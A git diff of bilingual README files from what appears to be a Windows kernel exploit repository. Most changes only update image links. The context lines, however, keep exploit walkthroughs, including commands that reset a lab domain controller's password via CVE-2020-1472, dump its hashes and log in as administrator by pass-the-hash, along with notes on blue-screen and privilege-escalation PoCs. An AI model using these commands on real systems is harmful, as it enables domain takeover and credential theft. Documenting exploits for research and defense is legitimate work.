+![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) diff --git a/CVE-2019-0623/README_EN.md b/CVE-2019-0623/README_EN.md index d5e8448..eb3bece 100644 --- a/CVE-2019-0623/README_EN.md +++ b/CVE-2019-0623/README_EN.md @@ -39,7 +39,7 @@ CompilerEnvironment POC is only valid for the X86 machine, the test machine is Windows 7 SP1 X86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif) diff --git a/CVE-2019-0803/README.md b/CVE-2019-0803/README.md index eac5325..8f1449f 100644 --- a/CVE-2019-0803/README.md +++ b/CVE-2019-0803/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803 这里测试机器是Windows Server 2008 R2 x64,上GIF图 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) #### 分析文章 - https://bbs.pediy.com/thread-260289.htm diff --git a/CVE-2019-0803/README_EN.md b/CVE-2019-0803/README_EN.md index cb7999b..286c011 100644 --- a/CVE-2019-0803/README_EN.md +++ b/CVE-2019-0803/README_EN.md @@ -40,7 +40,7 @@ CompilerEnvironment Here the test machine is Windows Server 2008 R2 X64, on the GIF map -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0803_win2008_r2_x64.gif) #### Analyze - https://bbs.pediy.com/thread-260289.htm diff --git a/CVE-2019-0808/README.md b/CVE-2019-0808/README.md index df15efb..53ffe67 100644 --- a/CVE-2019-0808/README.md +++ b/CVE-2019-0808/README.md @@ -25,7 +25,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808 - 编译有点问题 测试机器为Windows 7 SP1 x86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) diff --git a/CVE-2019-0808/README_EN.md b/CVE-2019-0808/README_EN.md index 5a6023c..5bf3301 100644 --- a/CVE-2019-0808/README_EN.md +++ b/CVE-2019-0808/README_EN.md @@ -26,7 +26,7 @@ CompilerEnvironment Test machine for Windows 7 SP1 X86 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0808_win_7_sp1_x86.gif) diff --git a/CVE-2019-1388/README.md b/CVE-2019-1388/README.md index a2f960f..a09efe4 100644 --- a/CVE-2019-1388/README.md +++ b/CVE-2019-1388/README.md @@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD 测试系统Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) #### 分析文章 - http://blog.leanote.com/post/snowming/38069f423c76 diff --git a/CVE-2019-1388/README_EN.md b/CVE-2019-1388/README_EN.md index 27c7c7a..4a498e3 100644 --- a/CVE-2019-1388/README_EN.md +++ b/CVE-2019-1388/README_EN.md @@ -42,7 +42,7 @@ https://github.com/Ascotbe/WindowsKernelExploits/blob/master/CVE-2019-1388/HHUPD Test system Windows 7 SP1 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1388_win7_sp1_x64.gif) #### Analyze - http://blog.leanote.com/post/snowming/38069f423c76 diff --git a/CVE-2019-1458/README.md b/CVE-2019-1458/README.md index b6dcf31..611d5ed 100644 --- a/CVE-2019-1458/README.md +++ b/CVE-2019-1458/README.md @@ -39,7 +39,7 @@ cve-2019-1458.exe 测试系统Windows 7 SP1 x64 ,直接上GIF图 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) #### 分析文章 - https://github.com/piotrflorczyk/cve-2019-1458_POC diff --git a/CVE-2019-1458/README_EN.md b/CVE-2019-1458/README_EN.md index 6adf307..ecaf333 100644 --- a/CVE-2019-1458/README_EN.md +++ b/CVE-2019-1458/README_EN.md @@ -40,7 +40,7 @@ cve-2019-1458.exe Test system Windows 7 SP1 x64 ,Direct GIF map -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-1458_win7_sp1_x64.gif) #### Analyze - https://github.com/piotrflorczyk/cve-2019-1458_POC diff --git a/CVE-2020-0668/README.md b/CVE-2020-0668/README.md index b176561..1ba5215 100644 --- a/CVE-2020-0668/README.md +++ b/CVE-2020-0668/README.md @@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668 该EXP是使用提权进行文件迁移操作,如果想使用cmd需要自己修改代码,测试机器Windows 10 1709 X64,动图中是把**test.dll**移动到 `C:\Windows\System32`目录下,**test.dll**可以是任意文件。使用exe时需要把**NtApiDotNet.dll**文件放到同级目录 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) > Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation. diff --git a/CVE-2020-0668/README_EN.md b/CVE-2020-0668/README_EN.md index cf79f94..d57ed98 100644 --- a/CVE-2020-0668/README_EN.md +++ b/CVE-2020-0668/README_EN.md @@ -42,7 +42,7 @@ CompilerEnvironment The exp is a file migration operation using rights, if you want to use CMD, you need to modify the code, test the machine Windows 10 1709 x64,The moving map is moved to the `C:\Windows\System32` directory, **Test.dll** can be any file. Put the **ntapidotNet.dll** file in the same level when using EXE -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif) > Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation. diff --git a/CVE-2020-0683/README.md b/CVE-2020-0683/README.md index dc1b9fd..de2a2e3 100644 --- a/CVE-2020-0683/README.md +++ b/CVE-2020-0683/README.md @@ -42,7 +42,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0683 测试机器Windows 10 1909 X64,源码中只对指定文件进行写入信息,如果需要获取某项程序的权限,需要自行修改源码 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) #### 分析文章 - [MSI_EoP_New.pdf](./MSI_EoP_New.pdf) diff --git a/CVE-2020-0683/README_EN.md b/CVE-2020-0683/README_EN.md index 434fdfb..677511a 100644 --- a/CVE-2020-0683/README_EN.md +++ b/CVE-2020-0683/README_EN.md @@ -42,7 +42,7 @@ CompilerEnvironment Test Machine Windows 10 1909 x64, only written information on the specified file in the source code, if you need to get the permissions of a program, you need to modify the source code yourself. -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0683_win10_1909_x64.gif) #### Analyze diff --git a/CVE-2020-0787/README.md b/CVE-2020-0787/README.md index fc86f81..b67efdd 100644 --- a/CVE-2020-0787/README.md +++ b/CVE-2020-0787/README.md @@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe 测试系统Windows 7 SP1 x64,直接上GIF图 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) #### 分析文章 - https://f5.pm/go-28382.html diff --git a/CVE-2020-0787/README_EN.md b/CVE-2020-0787/README_EN.md index 3e9ca70..ffbcaff 100644 --- a/CVE-2020-0787/README_EN.md +++ b/CVE-2020-0787/README_EN.md @@ -48,7 +48,7 @@ BitsArbitraryFileMoveExploit.exe Test system Windows 7 SP1 x64,Direct GIF map -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0787_win7_sp1_x64.gif) #### Analyze - https://f5.pm/go-28382.html diff --git a/CVE-2020-0796/README.md b/CVE-2020-0796/README.md index 5fc1c00..8c7629c 100644 --- a/CVE-2020-0796/README.md +++ b/CVE-2020-0796/README.md @@ -39,11 +39,11 @@ ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4 Get-FileHash -Path c:/windows/system32/drivers/srv2.sys ``` -![image-20200810115258497](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_powershell.png) +![image-20200810115258497](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_powershell.png) 然后就直接上GIF图了 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) #### 分析文章 - https://paper.seebug.org/1168/ diff --git a/CVE-2020-0796/README_EN.md b/CVE-2020-0796/README_EN.md index 0c6924a..4be0a29 100644 --- a/CVE-2020-0796/README_EN.md +++ b/CVE-2020-0796/README_EN.md @@ -40,11 +40,11 @@ View MD5 value Get-FileHash -Path c:/windows/system32/drivers/srv2.sys ``` -![image-20200810115258497](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_powershell.png) +![image-20200810115258497](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_powershell.png) Then directly gif map -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0796_win10_1903_x64.gif) #### Analyze - https://paper.seebug.org/1168/ diff --git a/CVE-2020-1015/README.md b/CVE-2020-1015/README.md index 94013c9..736bf8a 100644 --- a/CVE-2020-1015/README.md +++ b/CVE-2020-1015/README.md @@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015 测试机器Windows 10 1909 X64,会使CPU跑满导致蓝屏 -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) #### 分析文章 - https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html diff --git a/CVE-2020-1015/README_EN.md b/CVE-2020-1015/README_EN.md index 292a0ef..0a070c9 100644 --- a/CVE-2020-1015/README_EN.md +++ b/CVE-2020-1015/README_EN.md @@ -49,7 +49,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1015 Test Machine Windows 10 1909 x64, will make CPUs to lead blue screen -![](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) +![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1015_win10_1909_x64_poc.gif) #### Analyze - https://0xeb-bp.com/blog/2020/05/12/cve-2020-1015-analysis.html diff --git a/CVE-2020-1054/README.md b/CVE-2020-1054/README.md index 37ebe1d..1cf43e0 100644 --- a/CVE-2020-1054/README.md +++ b/CVE-2020-1054/README.md @@ -53,7 +53,7 @@ cargo build --release 接着直接在Windows 7 SP1 X64下运行即可 -![CVE-2020-1054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) +![CVE-2020-1054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) #### 分析文章 - https://www.anquanke.com/post/id/209329 diff --git a/CVE-2020-1054/README_EN.md b/CVE-2020-1054/README_EN.md index 66e8482..bf2785a 100644 --- a/CVE-2020-1054/README_EN.md +++ b/CVE-2020-1054/README_EN.md @@ -53,7 +53,7 @@ There are two points here to pay attention: Then run directly in Windows 7 SP1 X64 -![CVE-2020-1054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) +![CVE-2020-1054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1054_windows_7_x64.gif) #### Analyze - https://www.anquanke.com/post/id/209329 diff --git a/CVE-2020-1313/README.md b/CVE-2020-1313/README.md index 41e37f2..ad141bb 100644 --- a/CVE-2020-1313/README.md +++ b/CVE-2020-1313/README.md @@ -29,7 +29,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1313 测试机器Windows 10 1909 x64如图所示 -![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) +![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) #### 分析文章 - https://cloud.tencent.com/developer/article/1683124 diff --git a/CVE-2020-1313/README_EN.md b/CVE-2020-1313/README_EN.md index 3bc2d7a..ba073c6 100644 --- a/CVE-2020-1313/README_EN.md +++ b/CVE-2020-1313/README_EN.md @@ -29,7 +29,7 @@ CompilerEnvironment Test Machine Windows 10 1909 x64 as shown -![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) +![CVE-2020-1313_windos_10_1909_x64.gif](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1313_windos_10_1909_x64.gif) #### Analyze - https://cloud.tencent.com/developer/article/1683124 diff --git a/CVE-2020-1337/README.md b/CVE-2020-1337/README.md index 08d914a..7aa0a4d 100644 --- a/CVE-2020-1337/README.md +++ b/CVE-2020-1337/README.md @@ -51,7 +51,7 @@ sailay1996写了一个PS1脚本,但是有个限制是需要重启机器,首 测试机器Windows 10 1909 x64如图所示 -![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) +![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) #### 分析文章 - https://bbs.pediy.com/thread-261557.htm diff --git a/CVE-2020-1337/README_EN.md b/CVE-2020-1337/README_EN.md index 93ae322..37a2892 100644 --- a/CVE-2020-1337/README_EN.md +++ b/CVE-2020-1337/README_EN.md @@ -51,7 +51,7 @@ Sailay1996 wrote a PS1 script, but there is a limit to restart the machine. Firs Test Machine Windows 10 1909 x64 as shown -![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) +![CVE-2020-1337_windos_10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1337_windos_10_1909_x64.gif) #### Analyze - https://bbs.pediy.com/thread-261557.htm diff --git a/CVE-2020-1472/README.md b/CVE-2020-1472/README.md index 65d938f..6d76ce4 100644 --- a/CVE-2020-1472/README.md +++ b/CVE-2020-1472/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 测试机器Windows Server 2008 R2 SP1 X64 ,并且设置环境为域控机器 -![image-20201002201920794](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_dc-server.png) +![image-20201002201920794](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_dc-server.png) 由上图可知: @@ -55,7 +55,7 @@ git clone --depth=1 https://github.com/SecureAuthCorp/impacket python3 CVE-2020-1472_Scan.py dc 192.168.183.171 ``` -![image-20201002203037104](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_scan.png) +![image-20201002203037104](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_scan.png) > 利用脚本 @@ -66,7 +66,7 @@ python3 CVE-2020-1472_Scan.py dc 192.168.183.171 python3 CVE-2020-1472_Exploit.py dc 192.168.183.171 ``` -![image-20201002204223509](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_exp.png) +![image-20201002204223509](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_exp.png) 接着进入下载好的`impacket`项目,使用空密码登录 @@ -76,7 +76,7 @@ cd impacket/examples/ python3 secretsdump.py ascotbe.com/dc\$@192.168.183.171 -no-pass ``` -![image-20201002203751057](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_secretsdump.png) +![image-20201002203751057](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_secretsdump.png) 接着利用hash进行登录 @@ -85,7 +85,7 @@ python3 secretsdump.py ascotbe.com/dc\$@192.168.183.171 -no-pass python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:45280efa2300182b4f7fdc2cee182149 ascotbe.com/administrator@192.168.183.171 ``` -![image-20201002204817764](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_wmiexec.png) +![image-20201002204817764](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_wmiexec.png) > 还原密码 @@ -103,7 +103,7 @@ del sam.save del security.save ``` -![image-20201002205958192](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_hash.png) +![image-20201002205958192](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_hash.png) 接着进行解密 @@ -111,7 +111,7 @@ del security.save python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL ``` -![image-20201002210258903](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) +![image-20201002210258903](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) 可以看到这是之前修改之前的密码,接着回到桌面使用脚本恢复密码 @@ -120,7 +120,7 @@ python3 secretsdump.py -sam sam.save -system system.save -security security.save python3 CVE-2020-1472_RestoreOriginalPassword.py dc 192.168.183.171 d4ac5a73fd3f13dfd9d6de036a9e99a2 ``` -![image-20201002212122966](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_restore_original_password.png) +![image-20201002212122966](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_restore_original_password.png) #### 分析文章 - https://xz.aliyun.com/t/8367 diff --git a/CVE-2020-1472/README_EN.md b/CVE-2020-1472/README_EN.md index 5bc2549..98bf45a 100644 --- a/CVE-2020-1472/README_EN.md +++ b/CVE-2020-1472/README_EN.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 Test system Windows Server 2008 R2 SP1 X64 ,And set the environment to domain control machine -![image-20201002201920794](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_dc-server.png) +![image-20201002201920794](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_dc-server.png) As you can know above: @@ -55,7 +55,7 @@ This script is used to test whether the machine has a vulnerability python3 CVE-2020-1472_Scan.py dc 192.168.183.171 ``` -![image-20201002203037104](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_scan.png) +![image-20201002203037104](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_scan.png) > Use script @@ -66,7 +66,7 @@ The script will reset the password to empty! ! It is easy to control the loss! ! python3 CVE-2020-1472_Exploit.py dc 192.168.183.171 ``` -![image-20201002204223509](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_exp.png) +![image-20201002204223509](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_exp.png) Then enter the downloaded `impacket` project, log in with an empty password @@ -76,7 +76,7 @@ cd impacket/examples/ python3 secretsdump.py ascotbe.com/dc\$@192.168.183.171 -no-pass ``` -![image-20201002203751057](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_secretsdump.png) +![image-20201002203751057](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_secretsdump.png) Then use HASH to log in @@ -85,7 +85,7 @@ Then use HASH to log in python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:45280efa2300182b4f7fdc2cee182149 ascotbe.com/administrator@192.168.183.171 ``` -![image-20201002204817764](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_wmiexec.png) +![image-20201002204817764](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_wmiexec.png) > Restore password @@ -103,7 +103,7 @@ del sam.save del security.save ``` -![image-20201002205958192](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_hash.png) +![image-20201002205958192](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_hash.png) Next to decrypt @@ -111,7 +111,7 @@ Next to decrypt python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL ``` -![image-20201002210258903](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) +![image-20201002210258903](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_decrypt_hash.png) You can see that this is the password before modifying, followed by back to the desktop using the script recovery password @@ -120,7 +120,7 @@ You can see that this is the password before modifying, followed by back to the python3 CVE-2020-1472_RestoreOriginalPassword.py dc 192.168.183.171 d4ac5a73fd3f13dfd9d6de036a9e99a2 ``` -![image-20201002212122966](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-1472_restore_original_password.png) +![image-20201002212122966](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-1472_restore_original_password.png) #### Analyze - https://xz.aliyun.com/t/8367 diff --git a/CVE-2020-16898/README.md b/CVE-2020-16898/README.md index 1159f42..0dd8c07 100644 --- a/CVE-2020-16898/README.md +++ b/CVE-2020-16898/README.md @@ -31,15 +31,15 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1689 测试机器Windows 10 1709 x64如图所示 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_ipv6_open.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_ipv6_open.png) 接着把CVE-2020-16898.py脚本中的IPV6地址修改下 -![image-20201023092109185](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_py.png) +![image-20201023092109185](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_py.png) 最后使用命令`pip install scapy`,安装依赖包,接着直接利用即可蓝屏 -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) #### 分析文章 - https://www.anquanke.com/post/id/220862 diff --git a/CVE-2020-16898/README_EN.md b/CVE-2020-16898/README_EN.md index 40c3438..8b2bc59 100644 --- a/CVE-2020-16898/README_EN.md +++ b/CVE-2020-16898/README_EN.md @@ -32,15 +32,15 @@ At present, only the blue screen POC is public, and the amount is calculated as Test Machine Windows 10 1709 x64 as shown -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_ipv6_open.png) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_ipv6_open.png) Then the IPv6 address in the CVE-2020-16898.py script is then modified -![image-20201023092109185](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_py.png) +![image-20201023092109185](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_py.png) Finally use commands `Pip install scapy`, install dependency bag, then use it directly to use blue screen -![4](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) +![4](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16898_win_10_1709.gif) #### Analyze - https://www.anquanke.com/post/id/220862 diff --git a/CVE-2020-16938/README.md b/CVE-2020-16938/README.md index c64d865..ec2a65f 100644 --- a/CVE-2020-16938/README.md +++ b/CVE-2020-16938/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1693 直接利用7Z GUI的方式,即可在非管理员权限下查看config文件夹中的sam文件,而在Windows文件夹中查看会弹出UAC弹框 -![image-20201022162816397](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16938_win10_2004.png) +![image-20201022162816397](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16938_win10_2004.png) > 第二种方式 diff --git a/CVE-2020-16938/README_EN.md b/CVE-2020-16938/README_EN.md index 36de3e1..34a59d6 100644 --- a/CVE-2020-16938/README_EN.md +++ b/CVE-2020-16938/README_EN.md @@ -30,7 +30,7 @@ Test system Windows 10 2004 x64 Use the 7z GUI to view the SAM files in the Config folder, and view the UAC bomb box in the Windows folder. -![image-20201022162816397](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2020-16938_win10_2004.png) +![image-20201022162816397](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-16938_win10_2004.png) > Second way diff --git a/CVE-2021-1732/README.md b/CVE-2021-1732/README.md index d14b8c0..1a9b9bc 100644 --- a/CVE-2021-1732/README.md +++ b/CVE-2021-1732/README.md @@ -33,7 +33,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732 这里测试机器是Windows 10 1909 x64,上GIF图 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) #### 分析文章 - https://www.freebuf.com/vuls/270295.html diff --git a/CVE-2021-1732/README_EN.md b/CVE-2021-1732/README_EN.md index 4fddd87..34ccd64 100644 --- a/CVE-2021-1732/README_EN.md +++ b/CVE-2021-1732/README_EN.md @@ -34,7 +34,7 @@ CompilerEnvironment Here the test machine is Windows 10 1909 x64 -![1](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) +![1](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-1732_windows_10_1909_x64.gif) #### Analyze - https://www.freebuf.com/vuls/270295.html diff --git a/CVE-2021-26868/README.md b/CVE-2021-26868/README.md index f45cd6a..96b7501 100644 --- a/CVE-2021-26868/README.md +++ b/CVE-2021-26868/README.md @@ -40,7 +40,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-2686 测试系统Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### 代码来源 diff --git a/CVE-2021-26868/README_EN.md b/CVE-2021-26868/README_EN.md index 1091bea..397f9e8 100644 --- a/CVE-2021-26868/README_EN.md +++ b/CVE-2021-26868/README_EN.md @@ -41,7 +41,7 @@ CompilerEnvironment Test system Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### ProjectSource diff --git a/CVE-2021-33739/README.md b/CVE-2021-33739/README.md index 15df648..c258243 100644 --- a/CVE-2021-33739/README.md +++ b/CVE-2021-33739/README.md @@ -30,7 +30,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-3373 测试系统Windows 10 1909 X64 -![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) +![CVE-2021-26868&CVE-2021-33739_win10_1909_x64](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2021-26868&CVE-2021-33739_win10_1909_x64.gif) #### 